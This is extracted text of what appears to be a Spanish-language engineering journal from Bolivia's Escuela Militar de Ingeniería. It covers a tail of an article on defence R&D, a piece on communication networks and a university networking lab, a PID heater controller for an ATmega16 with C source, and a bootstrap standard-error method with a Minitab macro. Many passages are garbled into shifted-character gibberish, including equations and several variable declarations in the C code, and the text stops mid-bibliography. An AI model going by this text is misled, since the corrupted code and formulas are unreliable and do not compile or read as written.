opor[\UPKHKLZLJVU}TPJHZ`ÄUHUJPLYHZWHYHSVZPUKP]Pduos y las comunidades más pequeñas a través de PUPJPH[P]HZJVTVSHZTPJYVÄUHUaHZ Esto puede transformar la forma de hacer negocios con un cambio de las tradicionales estructuras jerárquicas a estructuras más pequeñas, en redes que favorezcan una distribución más uniforme del ILULÄJPV,SHJJLZVNLULYHSPaHKVHSHZ;0*[HTIPtU ofrece diversas oportunidades para la delincuencia organizada y los grupos terroristas. Estos grupos, que a menudo se basan en los espacios sin goIPLYUVL_WSV[HYmUYLKLZHKHW[HISLZ`ÅL_PISLZX\L desafíen los enfoques convencionales de orden público. La ubicuidad de los dispositivos de comunicaciones puede crear tensiones internas en los Estados autoritarios a medida que la censura es cada vez más difícil de lograr y es muy difícil prevenir el acceso “democratizado” al Internet. REFERENCIAS BIBLIOGRÁFICAS Bowns y Cornish, A Quantitative Analysis of MoKLYU*VUÅPJ[*OH[OHT/V\ZL0U[LYUH[PVUHS:Lcurity Programme, 2009. Bowns y Middleton, The Effect of Defence R&D on Military Equipment Quality, Defence and Peace Economics 2006, Volume 17(2), Abril 2006, pag. 117 - 139. 4LKPUH+VTtULJO9VZH4¡`9VKYxN\La(SJmzar, F. Javier, “Ciencia, tecnología y militarismo”. España 2005. 9(5+ ,\YVWL Perspectives on the Future of *VUÅPJ[!<246++PZJ\ZZPVU7HWLY, May 2009. Stockholm International Peace Research Institute (SIPRI) Handbook 2008, pág. 316. P A R A D I G M A Laboratorio de Redes 13 REDES DE COMUNICACIONES Y COMUNICACIONES DE REDES P Ing. Javier Felipe de Jesús Berthin Heredia JEFE DE PROYECTOS ALPHA SYSTEMS 720-02930 [email protected] [email protected] A RESUMEN R A D I G M A 14 El protagonismo de las redes de comunicaciones, que en el presente forman parte de nuestras vidas, han demostrado que cada uno de nosotros, podeTVZZHJHY\UZPUMxUKLILULÄJPVZ`WYV]LJOVZ[HU[V a nivel personal como en comunidad, considerando sobre todo, que en la mayoría de las redes de coT\UPJHJPVULZLZ[HTVZSVNYHUKV\UHÅ\PKLaKLPUformación y minimizando las distancias y el tiempo para el acceso a dicha información. PALABRAS CLAVE Redes, Comunicaciones, Networking, Inter Networking INTRODUCCIÓN Como todos bien sabemos, los términos RED o NETWORK representan de alguna forma para los más o menos entendidos, un servicio al cual podemos acceder en la mayoría de los casos como usuarios. Es el caso de la red de servicio de agua y alcantarillado, la red de servicio eléctrico, la red KLZLY]PJPVKL[LSLMVUxHÄQHVKL[LSLMVUxHT}]PS@ hoy en día, aunque de forma un poco más sencilla, tenemos otros tipos de redes de servicios que OHUPKVLTLYNPLUKVWYPUJPWHSTLU[LJVU\UZVSVÄU el de proveer servicios distribuidos y desplegados NLVNYmÄJHTLU[L`X\LZLVYPLU[LUHX\LLS\Z\Hrio, el cliente, pueda acceder u obtener información y sobretodo resultados no importando la posición NLVNYmÄJHLUSHX\LZLLUJ\LU[YL,ZLSJHZVWVY ejemplo, de las redes de farmacias, que en nuestro país, ahora ya cuentan con centros de atención a nivel nacional, y donde uno puede inclusive saber de forma más precisa y actualizada, la existencia de algún fármaco o medicina, que hasta se lo puede adquirir en otras ciudades o para otras ciudades. Lo que describimos líneas arriba no es más que un servicio, que nos garantiza el poder obtener resultados concretos y satisfacer nuestras necesidades, para esto comenzamos a cambiar nuestros conceptos, y es que en un banco, en un punto de cobranza, en un centro farmacéutico, cajeros au- tomáticos, adquirimos la idea de que son “puntos de acceso” donde podremos conseguir nuestros objetivos. Una vez que asimilamos que estos “puntos de acceso” son la posibilidad de acceder a información y sobretodo transacciones de todo tipo, el siguiente paso es poder analizar cuál puede ser el límite de estas redes de servicios, y es así que podemos comenzar a catalogar redes pequeñas, redes locales, redes TLKPHUHZ NYHUKLZ J\`H JSHZPÄJHJP}U KLWLUKLYm concretamente del alcance y cobertura que brinden a sus usuarios. Un ejemplo de una red con cobertura mundial es el sistema SABRE, que se encarga de gestionar la reserva y compra / venta de pasajes en las líneas aéreas. Y hay muchos otros ejemplos todavía más claros como ser las redes de intercambio de información en línea para mensajería, buscadores, correo electrónico y muchas otras aplicaciones. Figura 1. Sistema SABRE, red de cobertura mundial RED DE SERVICIOS OPERATIVA En base a esta introducción y conceptos sobre redes, nos enfocamos en que la importancia de LU[LUKLYSVJYP[PJVX\LZPNUPÄJHLSOLJOVKLSVNYHY que las redes de servicios se mantengan operativas y con provisión de servicios, si es posible, las 24 horas del día. Es así, que para nosotros como usuarios, el tener un problema de acceso a internet, ya se nos convierte en una gran frustración, ni que decir, si me voy a comprar un pasaje aéreo, y en la agencia de turismo o línea aérea me responden que “No hay sistema”, y inclusive yéndonos a algo muy simple, que en una farmacia, tenga que tardar el doble o triple de tiempo, para poder obtener un simple medicamento, que por problemas en la red, no permite desplegar el sistema de inventarios para saber cuál es el saldo de dicho ítem. Al darnos cuenta de lo importante que es tener una red de servicios operativa, debemos saber que los ZLY]PJPVZ ZVU HWSPJHJPVULZ KLZHYYVSSHKHZ JVU ÄULZ objetivos y que con ayuda de bases de datos, algoritmos de búsqueda, y transaccionales, logran el VIQL[P]V KL SVZ \Z\HYPVZ ÄUHSLZ 7LYV [VKHZ LZ[HZ aplicaciones, están viajando y transportando información a través de una “plataforma” que en si es la “red de comunicaciones”. El concepto más simple de una red de comunicaciones de cualquier tipo, es que son simplemente “RUTAS” o caminos por los J\HSLZ`VW\LKV]PHQHY[YHUZWVY[HY`[YHÄJHYPUMVYmación en sentido bidireccional, logrando un proceso de transmisión y recepción con determinados objetivos. Las rutas son creadas en forma física y lógica y todo esto es parte de un gran campo de actividades y profesiones que se centralizan en áreas de NETWORKING e INTER-NETWORKING. Estas 2 áreas se centralizan en nuestra primera parte del título del artículo que es “redes de comunicaciones” Para hacer que las rutas estén disponibles hoy en día se cuentan con una gran cantidad de herramientas y especializaciones en las carreras de Ingeniería de Sistemas, de Telecomunicaciones, Electrónica, Informática, Telemática, las cuales de una forma u otra van a resumir sus actividades dentro del conocido modelo OSI principalmente con el objetivo de segmentar las capas o niveles de soluciones a los problemas que se presentan desde la capa física hasta la capa de aplicaciones. LABORATORIO DE REDES DE LA EMI En la ESCUELA MILITAR DE INGENIERIA, se han estado formando profesionales con conocimientos y experiencia muy sólidos en las distintas carreras que ofrecen, y ahora, luego de un proceso de aná- lisis y dimensionamiento adecuado, se está implementando un laboratorio que permita preparar a los estudiantes, para encarar y poder tener la preparación y experiencia en lo relacionado a la instalación, ZVWVY[LJVUÄN\YHJP}U`VW[PTPaHJP}UKLYLKLZKL JVT\UPJHJPVULZ,Z[VZPNUPÄJHX\LLSM\[\YVWYVMLsional que egresa de la E.M.I., no solamente tendrá el conocimiento conceptual sino que podrá haber ya encarado el manejo de equipamiento de redes, y lo más importante, brindar a los estudiantes ese NYHUZHS[VKLSVX\LZPNUPÄJHLSTHULQV`HKTPUPZtración de equipos reales de redes que hoy existen en un 99% de las redes más grandes y corporativas de nuestro país y del mundo entero. Para encarar este tipo de proyectos, se requiere de “Visión”, dado que cualquier tipo de proyectos relacionados a plataforma y equipamiento de comunicaciones y telecomunicaciones, son inversiones fuertes y que deben tener un análisis de retorno a dicha inversión. Es éste el elemento que ha permitido por parte de los directores y ejecutivos de la E.M.I. para poder alcanzar y lograr un paso importantísimo para la institución y estudiantes, dado que este es un laboratorio que no hay en ninguna otra institución de educación superior ni técnica especializada y que da un importante valor adicional a las carreras. Pero la Visión de la que hablamos no queda ahí. Porque la tecnología es muy dinámica, y constantemente va migrando y evolucionando, razón por la cual, las redes de comunicaciones hace un tiempo, se concentraban en la parte de transmisión de DATOS, y con esto se lograba satisfacer la integración de todas las aplicaciones que involucran la transferencia de información. Pero hoy en día, ya escuchamos hablar de “Redes Convergentes”, las cuales se orientan a integrar lo tradicional que era el mundo de datos, con aplicaciones en “Tiempo Real”, como ser la integración de aplicaciones de voz y video. Las redes convergentes hoy en día, son el escenario ideal para que una corporación o una empresa pueda integrarse con aplicaciones de distintos proK\J[VZHZ\ZWVSx[PJHZKLÅ\QVKLPUMVYTHJP}U3VZ primeros requerimientos fueron y son satisfechos con soluciones que hoy en día son muy conocidas como el Skype, y herramientas de mensajería instantánea y que nos permite a la vez poder compartir recursos e información a través de la nube pública que es Internet. Sin embargo, a medida que pasa el tiempo, estos requerimientos también van requiriendo de herraTPLU[HZ TmZ LZWLJPÄJHZ ` X\L JVYWVYH[P]HTLU[L P A R A D I G M A 15 P WVKYmU WLYZVUHSPaHY Å\QV KL PUMVYTHJP}U ` HWSPJHciones privadas y que puedan satisfacer políticas concretas y que a la vez puedan orientarse a concretar el Retorno a La Inversión que las empresas van haciendo en el rubro tecnológico. A Lo ideal, es que la convergencia de la que hablamos, permita que los equipos puedan soportar estas nuevas aplicaciones y requerimientos, de tal manera, una inversión es mucho mejor aprovechada, y permite una migración e integración de servicios, con mínimos cambios en la red y sobretodo en sus equipamientos. R A D I G M A 16 De la misma forma, es sumamente importante menJPVUHYX\LZPIPLUOH`LULSTLYJHKV\UZPUÄUKL aplicaciones y ofertas de equipos y soluciones, es crítico poder analizar cuánto del tiempo de personal de la Empresa o Corporación se puede gastar o utilizar, solamente intentando solucionar problemas técnicos, los cuales por ser de diferentes marcas, o interfaces de usuarios, requieran de tiempos de aprendizaje y niveles de dependencia créticos. Entonces entendemos que la GESTION DE RED, se convierte en una variable muy importante a considerar. Esta variable en muchos casos apunta a ser centralizada hoy en día, pero a la vez, debería considerarse su potencial “movilidad” y acceso remoto, para no crear una dependencia logística. De tal manera, aplicaciones como Telefonía IP, Voz sobre IP, Video Conferencia, y aplicaciones compartidas, podrían tener un soporte centralizado y descentralizado a la vez, que permita el uso de estas aplicaciones desde cualquier punto de la red corporativa. Es importante complementar que el laboratorio que la E.M.I. está implementando, también está orientado a este tipo de soluciones y aplicaciones, en una fase preliminar, también está incluído dentro de la currícula de aprendizaje. De tal manera, complementariamente a una cantidad de prácticas y de SHIVYH[VYPVZX\LZL]HUHPTWSLTLU[HYJVULSÄUKL dar la experiencia y practica en el campo real a los futuros profesionales, también a la vez los va a formar y preparar para el momento en el cual deseen YLUKPYZ\ZJLY[PÄJHJPVULZJVTVSHKLS**5(T\` conocida en cualquier tipo de trabajo relacionado a redes, y complementariamente, los equipos adquiridos por la E.M.I, también está preparados para soportar proyectos con infraestructura compatible con IP versión 6, y que a la vez puedan interactuar entre los 2 escenarios tanto de IPv4 como IPv6. Complementariamente los equipos también están proyectados a satisfacer laboratorios y preparación WHYH SH JLY[PÄJHJP}U KL **57 [HTIPtU T\` IPLU conocida y desplegada en todo los escenarios de redes y comunicaciones y cuenta con los componentes esenciales para preparación para exámenes de voz y telefonía IP, y de comunicaciones inalámbricas con componentes del espectro 802.11 a/b/ g/n. COMUNICACIONES DE REDES No satisfechos con todo lo descrito anteriormente y de forma breve pero a la vez con el objetivo de no dejar este articulo incompleto, es que mencionamos lo que hoy en día son las “comunicaciones de redes” y es que la tecnología y la convergencia de redes está avanzando tan dinámicamente, que para nosotros es muy usual haber escuchado servicios Triple Play, que se orientan a la provisión de servicios por un solo medio, pudiendo ser una red TL[YVÄIYHOHZ[HLSOVNHYH[YH]tZKLSJHISLJVHxial del video cable. Este tipo de servicios apuntan a proveer servicios de distinto tipo dentro de una sola infraestructura, de tal manera que para cualquier usuario el poder acceder a estos servicios solamente se concentra en 1 tipo de proveedor y una sola conexión hacia la casa o residencia. El termino nuevo que se está comenzando a esJ\JOHY LZ LS KL ¸*VT\UPJHJPVULZ <UPÄJHKHZ¹ V “Colaboración”, donde han comenzado a predominar la integración de Computadoras de escritorio, computadoras Laptops, o netbooks, o ultrabooks, también de dispositivos plenamente móviles como las tabletas y sobre todo los Smartphones o teléfonos inteligentes o los sensacionales phablets que concentran en un solo sistema un conglomerado de aplicaciones tanto públicas como corporativas. La comunicación de redes, tiene como principal objetivo, subir servicios de voz, de video y de datos a una sola plataforma, y si es posible inscribirla en un solo dispositivo, donde un usuario bajo el concepto de manejar un sistema operativo, este indirectamente integrando las aplicaciones que permiten sintonizar todo el espectro de soluciones, programas y aplicaciones emergentes en el mercado. CONCLUSIÓN Queda mucho por delante, y por lo dinámico que se convierte este campo, nos importa mucho poder agarrar el ritmo, e ir asimilando este hermoso y fantástico mundo de las telecomunicaciones. CONTROLADOR DIGITAL PID EN UN MICROCONTROLADOR ATMEL Ing. Germán Jesús Pereira Muñoz Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería Irpavi (La Paz) Bolivia P A RESUMEN Dado el amplio uso de los controladores PID en el ámbito industrial (control de potencia en motores de inducción, control de nivel, caudal y presión en procesos químicos entre otros), el uso de microcontroladores para el desarrollo de este tipo de aplicaciones ha tomado fuerza gracias a la incorporación de lenguajes de alto nivel que facilitan ampliamente este tipo de implementaciones, además de los bajos costos de adquisición de estos dispositivos, distribución de software de desarrollo gratuito (GNU) y amplia información en la Internet. Este artículo tiene como propósito mostrar un método de diseño práctico y sencillo en el desarrollo de controladores digitales PID implementados en TPJYVJVU[YVSHKVYLZ(;4,37HYH[HSÄUZL[VTHYH como ejemplo un sistema de calefacción (heater) al cual se le realizara inicialmente un modelamiento basado en el método de curva de reacción, calculo de parámetros y/o constantes de control PID mediante técnica de sintonización Ziegler–Nichols y por ultimo se mostrara la metodología de implementación de este controlador en un microcontrolador ATMEGA16, utilizando como herramienta de validación el software de simulación ISIS Proteus. En el dominio de la frecuencia, el controlador PID se puede escribir como: SINTONIZACIÓN DE CONTROLADOR MEDIANTE ZIEGLER-NICHOLS ,USHaVHIPLY[VT\JOVZWYVJLZVZW\LKLUKLÄUPYse según la siguiente función de transferencia: +VUKL SVZ JVLÄJPLU[LZ 2 ` ZL VI[PLnen de la respuesta del sistema en lazo abierto a una entrada escalón. Se parte del sistema estabilizado en y(t) =y0 para u(t)=u0. Se aplica una entrada escalón de u0 a u1 (el salto debe estar entre un 10% y un 20% del valor nominal) y se registra la respuesta de la salida hasta que se estabilice en el nuevo punto de operación [2]. Los parámetros se pueden obtener de la respuesta mostrada en la Figura 1: CONTROLADOR PID Es interesante señalar que más de la mitad de los controladores industriales que se usan hoy en día utiSPaHULZX\LTHZKLJVU[YVS70+V70+TVKPÄJHKV3VZ controladores PID analógicos, son principalmente de tipo hidráulico, neumático, electrónico, eléctrico o sus combinaciones. En la actualidad, muchos de estos se transforman en formas digitales mediante el uso de microprocesadores [1]. Se puede indicar que un controlador PID responde a la siguiente ecuación: R A D I G M A donde e(t) es el error de la señal y u(t) es la entrada de control del proceso. Kp es la ganancia proporcional, Ti es la constante de tiempo integral y Td es la constante de tiempo derivativa. Figura 1. Respuesta de salida ante una entrada escalón. 17 P Según Ziegler-Nichols, la relación de estos coeÄJPLU[LZJVUSVZWHYmTL[YVZKLSJVU[YVSHKVYZVU! CONTROLADOR DIGITAL PID A R La función de transferencia para el controlador PID digital se convierte en [3]: La función de transferencia discreta (6), también puede ser representada como [2]: A D Existen distintas posibilidades de la realización práctica de un controlador PID, una de las mas habituales es la realización en paralelo: I M Figura 2. Diseño paralelo de controlador PID. ALGORITMO DE PROGRAMACIÓN EN MICROCONTROLADOR MODELAMIENTO DEL SISTEMA DE CALEFACCIÓN Temperature Ambient (°C)= 25 Thermal Resistence to Ambient (°C/W)= 0.7 Oven Time Constant (sec)= 1000 Heater Time Constant (sec)= 1 ;LTWLYH[\YLJVLMÄJPLU[=*$ Heating Power (W)= 20 El modelo esquemático OVEN contiene un terminal sensor T que entrega un voltaje proporcional a la temperatura del sistema. De acuerdo a los parámetros establecidos anteriormente, este terminal entregara 1V/°C, es decir, que para una temperatura de 100°C, el terminal T entregara 100V. Para obtener la respuesta del sistema en lazo abierto ante una entrada escalón (curva de reacción), se utiliza el sistema de análisis interactivo de ISIS Proteus Interactive Analysis (Graph Mode Tool), el cual interactúa con el sistema OVEN mediante el uso de un Voltage Probe1 OV1(T), según se muestra en la Figura 4. Observar que para realizar la entrada escalón de 0V a 2V se utiliza un interruptor SW1. El algoritmo utilizado para programar el ATMELse muestra en la Figura 3. El muestreo (T) debe ser mayor que el tiempo de establecimiento del sistema en lazo abierto. En el modelo Ziegler-Nichols ZL[VTH\U]HSVY;# Figura 4. Esquemático para análisis de respuesta ante entrada escalón. A 18 Temperatura Ambiente de trabajo, resistencia térmica, constante de tiempo de establecimiento, JVUZ[HU[LKL[PLTWVKLJHSLU[HTPLU[VJVLÄJPLU[L de temperatura y Potencia de calentamiento. Para facilidades de simulación se establecerán los siguientes valores de parámetros funcionales del modelo OVEN: Donde: G Para la implementación y simulación del controlador PID se utilizara el software ISIS Proteus. Este software ofrece el modelo esquemático de un sistema de calefacción denominado OVEN, al cual se le pueden variar sus características funcionales tales como: De la recta de máxima pendiente se deducen los WHYmTL[YVZ `RKLÄUPKVZWVYLSHUmSPZPZLU lazo abierto de Ziegler-Nichols. Figura 3. Algoritmo de programación de PID digital en microcontrolador. PID en el microcontrolador, el código fuente propuesto es: CÓDIGO FUENTE EN LENGUAJE C PARA CONTROLADOR PID DISCRETO Figura 5. Determinación de los parámetros por método de curva de reacción. Por tanto el modelo del sistema de calefacción X\LKHKLÄUPKVHZx! 1 Hacer click derecho sobre el Interactive Analysis, seleccionar Add Traces Ctrl+A y anexar el OV1(T). Los parámetros Kp, Ti y Td se calculan según la Regla de Sintonización de Ziegler-Nichols basada en la respuesta al escalon [1]: Remplazando los valores de Kp, Ti y Td en las ecuaciones dadas en (8), y estableciendo un peYPVKVKLT\LZ[YLV;$ZZLNUJYP[LYPV;# los parámetros del controlador discreto son: IMPLEMENTACIÓN DE CONTROLADOR DIGITAL PID EN MICROCONTROLADOR Consideraciones Preliminares Se requiere de un conversor Análogo/Digital para ingresar el voltaje entregado por el sensor T del modelo OVEN. Dado que dicho terminal entrega 1V/°C, se utiliza un divisor de voltaje para adecuar la señal del sensor a niveles permitidos por el conversor A/D; en este caso se utiliza un divisor de voltaje con factor 100, es decir, que para una temperatura de 100°C (100V) el conversor recibirá 1V. El control se realiza mediante una señal PWM proporcional a la señal generada por el controlador. Por tanto el uso del microcontrolador ATMEGA16 [6] es pertinente para la aplicación descrita. Para la realización del código fuente se utilizo el compilador WINAVR [4], [5]. De acuerdo al algoritmo planteado en la Figura 4 para programación de #include <avr/io.h> #include <inttypes.h> #include “global.h” #include “a2d.h” #include “timer.h” PWM, etc) // Acceso de control I/O // Tipos de datos // libreria de adc // libreria de timer (timing, #include <util/delay.h> int main(void) { u16 valor, control; //Variables para lectura de ADC y señal de Control a módulo CCP ÅVH[HIJ" *VUZ[HU[LZ WHYH WHYmmetros de controlador PID ÅVH[TEMPERATURA_LIMITE; //Referencia de Temperatura ÅVH[Y;L;P;K;`;\;P;L;" =HYPHISLZ KL controlador PID ÅVH[TH_TPU" =HYPHISLZ WHYH HU[P^PUdup min=0.0; max=1000.0; iT0=0.0; eT0=0.0; a=0.1243; b=0.0062; c=0.6215; TEMPERATURA_LIMITE=1200.0; //Set Point r(kT)= 120°C a2dInit(); //Activando el conversor ADC a2dSetPrescaler(ADC_PRESCALE_DIV32); a2dSetReference(ADC_REFERENCE_AVCC); sbi(DDRD, PD4); sbi(DDRD, PD5); // initialize the timer system timerInit(); timer1PWMInit(8); // Inicializando el PWM timer1PWMAOn(); //timer1PWMBOn(); while(1) { valor=a2dConvert10bit(0); //Leer ADC Canal 0 TEMPERATURA_LIMITE=a2dConvert10bit(1); // Set Point r(kT) yT=(5000.0*valor)/1024.0; //Escalizar señal de salida y(kT) rT=(5000.0*TEMPERATURA_LIMITE)/1024.0; eT=rT-yT; //Calcular senal de error e(kT) iT=b*eT+iT0; //Calcular termino integrativo i(kT) P A R A D I G M A 19 P A R A D I dT=c*(eT-eT0); //Calcular termino derivativo d(kT) uT=iT+a*eT+dT; //Calcular senal de control u(kT) if (uT>max) { //Anti-windup uT=max; } else { if (uT<min) { uT=min;} } control=uT; timer1PWMASet(control); //Transferencia de senal de control al actuador iT0=iT; eT0=eT; //_delay_ms(100); //Periodo de muestreo T=0.1s } return(0); } DIAGRAMA ESQUEMÁTICO Y SIMULACIÓN DE CONTROLADOR PID EN ISIS PROTEUS Para la generación de perturbaciones se utiliza el conmutador SW1, el cual permite cambiar el valor de la fuente de alimentación al sistema OVEN. Para el instante de tiempo t=0s. se utilizo la fuente de alimentación BAT2 de 12V, para el instante de tiempo t=60s se conmuto a la fuente de alimentación BAT1 de 24V y para el instante de tiempo t=105s se conmuto nuevamente a la fuente de alimentación BAT2 de 12V. Como se puede apreciar en la Figura 6, el controlador PID responde de THULYH T\` LÄJPLU[L ZPN\PLUKV SH YLMLYLUJPH KL 120°C establecido en el código fuente. G Figura 7. Diagrama esquemático de controlador PID en microcontrolador Figura 8. Diagrama esquemático de microcontrolador utilizando el algoritmo controlador PID en una aplicación de control en tiempo real Figura 9.7HU[HSSHNYHÄJHJVUSHZHSPKHKLSZPZ[LTH aplicando el algoritmo de control PID OBSERVACIONES M Figura 6a. Resultado de la simulación mediante Interactive Analysis. La escalizacion de la señal de salida y(kT) en el código fuente se debe multiplicar por un factor de 100 debido al factor de división que se utilizo para adecuar la señal del sensor del sistema OVEN. A 20 Las resistencias R1 y R2 son de 99k y 1k respecti]HTLU[L3HJVUÄN\YHJP}UTVZ[YHKHLUSH-PN\YH permite obtener un divisor de voltaje con factor 100. Figura 6b. Resultado de la simulación mediante Interactive Analysis. La simulación inicia con una magnitud de temperatura igual a 25°C en t=0s, dado que este valor es la temperatura ambiente de trabajo del sistema OVEN. Si desea hacer mas interactivo el sistema de control propuesto, se puede variar el código fuente para que el valor de referencia r(kT) o Set Point pueda ser ingresado por usuario a través de un teclado matricial o a través de un PC utilizando comunicación RS-232. CONCLUSIONES El uso de lenguajes de programación de alto nivel; como es el caso del compilador WINAVR, facilita ampliamente la implementación de controladores PID u otro tipo de esquema de controlador sobre dispositivos microcontrolados, abriendo así una alternativa de desarrollo de sistemas de control a bajo costo, dado que este lenguaje permite fácilmente adicionar periféricos para ingreso de datos y supervisión de variables de estado del sistema controlado; como por ejemplo teclados matriciales y LCD’s respectivamente, y además la implementación de sistemas de comunicación tales como USB, CAN, Ethernet, Bluetooth entre otros, ya son soportados por algunas gamas de microcontroladores y pueden ser administrados fácilmente a través de este tipo de compiladores. Como bien se explica en el desarrollo de este paper, la tarea fundamental para el diseño de un con- trolador PID esta en la obtención de los parámetros del sistema que se desea controlar (planta), dado que a partir de estos parámetros se utilizan reglas de sintonización para hallar las constantes del controlador Kp, Ti y Td. Una vez calculadas estas constantes podrá utilizar como Template el código fuente expuesto, y solo requerirá reemplazar el valor de las constantes del controlador PID y por supuesto el respectivo valor de Periodo de Muestreo, el cual esta en términos de solamente un retardo. BIBLIOGRAFIA 1 Ogata, Katsuhiko. Ingeniería de Control Moderna. Controles PID e introducción al control robusto. Tercera edición. Pagina 669. Editorial Prentice Hall. 1998. 2 Ogata, Katsuhiko. Sistemas de control en tiempo discreto. Segunda edición. Pagina 116. Editorial Prentice Hall. 1996. 3 ATMEL Atmega16 Datasheet. Disponible en internet en http://www.atmel.com/downloads/ DeviceDoc/3282b.pdf. P A R A D I G M A ,Z[\KPHU[LZVÄJPHSLZKLSHZ[YLZM\LYaHZ`JP]PSLZ 21 P APLICACIÓN DEL MÉTODO BOOTSTRAP PARA LA ESTIMACIÓN DEL ERROR ESTÁNDAR DE LA MEDIA MUESTRAL A R Lic. Dindo Valdez Blanco Departamento de Ingeniería de Sistemas – Escuela Militar de Ingeniería Irpavi (La Paz) Bolivia RESUMEN A D I G M A 22 En este artículo se presenta una aplicación del método de estimación denominado Bootstrap, LZWLJxÄJHTLU[L HWSPJHKV LU SH LZ[PTHJP}U KL SH desviación estándar del estimador de la media y la mediana. Para realizar la aplicación se desarrolla una macro realizada en el programa Minitab versión 15.0 en español para Windows. PALABRAS CLAVE bootstrap, minitab, error estándar, intervalo de conÄHUaHWYLJPZP}U INTRODUCCIÓN En la mayoría de los estudios estadísticos se utilizan los estimadores clásicos como la media muestral, y en base a la misma se calculan intervalos de conÄHUaHWHYHSHTLKPHWVISHJPVUHSLSWYVISLTHYHKPca cuando se desea utilizar otro estimador como la mediana muestral, surge entonces la pregunta ¦LZWVZPISLJHSJ\SHY\UPU[LY]HSVKLJVUÄHUaHWHYH la mediana poblacional?, justamente este artículo propone el uso de la metodología Bootstrap como una alternativa de respuesta. El método Bootstrap es una buena opción para realizar estimaciones cuando los estadísticos son difíciles de manipular algebraicamente y no se puede encontrar una expresión matemática de sus estadísticas como el error estándar del estimador de la mediana, en vista que dicho estimador está relacionado con los estadísticos de orden, su función de probabilidad depende del tamaño de la muestra y de la función de distribución de donde es extraída la muestra aleatoria. ESTIMACIÓN DEL ERROR ESTÁNDAR DE LA MEDIANA POR EL MÉTODO BOOTSTRAP Para desarrollar el concepto, se generan 50 datos aleatorios de una ley de probabilidad exponencial JVUTLKPH $SHÄN\YHT\LZ[YHLSOPZ[VNYHTH de los datos obtenidos por simulación. EL MÉTODO BOOTSTRAP En estadística, el método Bootstrap, es aplicado para estimar la medida de precisión de los estimadores muestrales denominado el error estándar del estimador. Esta técnica permite la estimación de la distribución muestral de cualquier estimador utilizando únicamente un método de remuestreo. Lo HU[LYPVYLZ[PSWHYHJHSJ\SHYPU[LY]HSVZKLJVUÄHUaH y pruebas de hipótesis de estadísticos como la mediana muestral, la correlación muestral, etc. Figura 1. Histograma de la muestra aleatoria exponencial Considerando este conjunto de datos como una muestra aleatoria de tamaño n=50, se calcula una media muestral ¯x=15.98 y la desviación estándar de la muestra S=16.31. De esta manera el estimador de la media de la distribución de probabilidad L_WVULUJPHSM_$ LE_ HWHY[PYKLSTt[VKV de momentos o del método de máxima verosimili[\KLZ!ÿ$ ÿ$Þ_$ Luego el error estándar estimado del estadístico ¯x está dado por: Utilizando el método Bootstrap para realizar tal estimación del error estándar de la media, es necesario emplear el siguiente proceso: 1° Se selecciona una muestra aleatoria con reemplazo de la muestra original con el mismo tamaño n=50 y se calcula la media de la muestra ¯x. 2° Se repite el paso 1º un número de veces determinado digamos B, y se calcula media muestral en cada caso: ¯x_1,¯x_2,…,¯x_B. 3° Se calcula la desviación estándar de los B promedios estimados en el paso 2º y se toma este valor como la estimación del error estándar de ¯x. En el método Bootstrap es necesario que las muestras generadas en el paso 2º sean del mismo tamaño n de Macro # Inicio de la macro bootstrap c1 # En este paso se nombra la macro como boot1 mcolumn c1 c10 c11 :LKLÄULUSHZJVS\TUHZKVUKLZLHSTHJLUHYmU los datos mconstant k1 k2 k3 k4 k5 :LKLÄULUSHZJVUZ[HU[LZKLSWYVNYHTH erase c10 # Se borran los datos de la columna c10 let k1 = n(c1) # Se hace que la consante k1 sea igual al tamaño de la muestra let k2 = 300 :LKLÄULLSUTLYVKLT\LZ[YHZ)X\LZLNLULrarán do k4=1:k2 # Inicio del contador k4 que va de 1 a k2 sample k1 c1 c11; # Se genera una muestra aleatoria con reemplazo de tamaño replace. # k1 de la columna c1 y se almacena en la columna c11 let k5 = mean(c11) # Se calcula la media muestral y se almacena en k5 stack c10 k5 c10 # Se almacena la media muestral en la columna c10 enddo # Fin del contador let k3 = stdev(c10) # Se calcula la desviación estándar de las medias muestrales print k3 # Se imprime el error estándar estimado de la media muestral endmacro # Fin de la macro la muestra original. Si el tamaño de las muestras es menor que n, entonces el procedimiento tiende a sobreestimar el error estándar de ¯x, de igual manera si el tamaño de las muestras es mayor que n, entonces el procedimiento tiende a subestimar la desviación estándar. Para realizar la aplicación de la metodología Bootstrap con nuestro ejemplo se ha desarrollado una macro en el programa Minitab versión 15.0 para Windows en español, la misma tiene las siguientes sentencias: Figura 2. Macro que ejecuta el método Bootstrap con la muestra aleatoria Haciendo correr la macro con el método Bootstrap KLSHÄN\YHZLVI[PLUL\U]HSVYLZ[PTHKVKLSLYYVY LZ[mUKHYKLSHTLKPHT\LZ[YHSPN\HSH ÿFÞ_$ , el mismo es un valor cercano al calculado con la clásica fórmula del error estándar de la media. El ]HSVY KL SHZ YLT\LZ[YHZ )$ LZ Z\ÄJPLU[L WHYH estimar el error estándar de la media, sin embargo se pueden realizar más replicas en el método de Bootstrap. La metodología Bootstrap puede ser utilizado con cualquier tamaño de muestra sin embargo es evidente que con muestras muy pequeñas LSTt[VKVUVLZ[HUJVUÄHISLWHYH]LYPÄJHYLZ[VZL hizo correr la macro con n=10 y se obtuvo un valor estimado del error estándar igual a 4.8782, de tal forma que esta estimación tiene un margen de error muy alto. En este caso no era necesario estimar el error estándar de la media ¯x con este método en vista que se tiene la fórmula de la misma. El método Bootstrap es útil cuando no se tiene una fórmula explícita de la desviación estándar del estimador, por ejemplo no existe una fórmula general para calcular el error estándar de la mediana muestral. En este caso si se desea estimar la desviación estándar de la mediana muestral por el método Bootstrap simplemente hay que calcular las medianas de cada réplica en lugar de los promedios (reemplazar la línea de código let k5 = mean(c11) por let k5 = median(c11) en la macro de Minitab), realizando el cambio y haciendo correr la macro se obtiene un valor estimado del error estándar de la mediana T\LZ[YHSPN\HSH ÿFTL$ ,Z[LYLZ\S[HKVLZ P A R A D I G M A 23 P A R A KLJVUÄHYX\LZLHWYV_PTLIHZ[HU[LHS]HSVYL_HJto. CONCLUSIÓN El método de Bootstrap desarrollado para estimar SHKLZ]PHJP}U[xWPJHKL\ULZ[PTHKVY ÿKL\UWHYmTL[YV ZLW\LKLKLJPYX\LLZ\UTt[VKVUVWHramétrico de estimación. En vista que las muestras Bootstrap son obtenidas por muestras repetidas con reemplazamiento de los mismos datos y no se realiza ninguna suposición respecto a la distribución de probabilidad del estimador. BIBLIOGRAFÍA ,MYVU ) ;PIZOPYHUP 9 “Bootstrap me[OVKZ MVY Z[HUKHYK LYYVYZ JVUÄKLUJL PU[LY]HSZ and other measures of statistical accuracy”. Revista electrónica Statistical Science, 1(1), páginas 54-77. )YHKSL`,MYVU 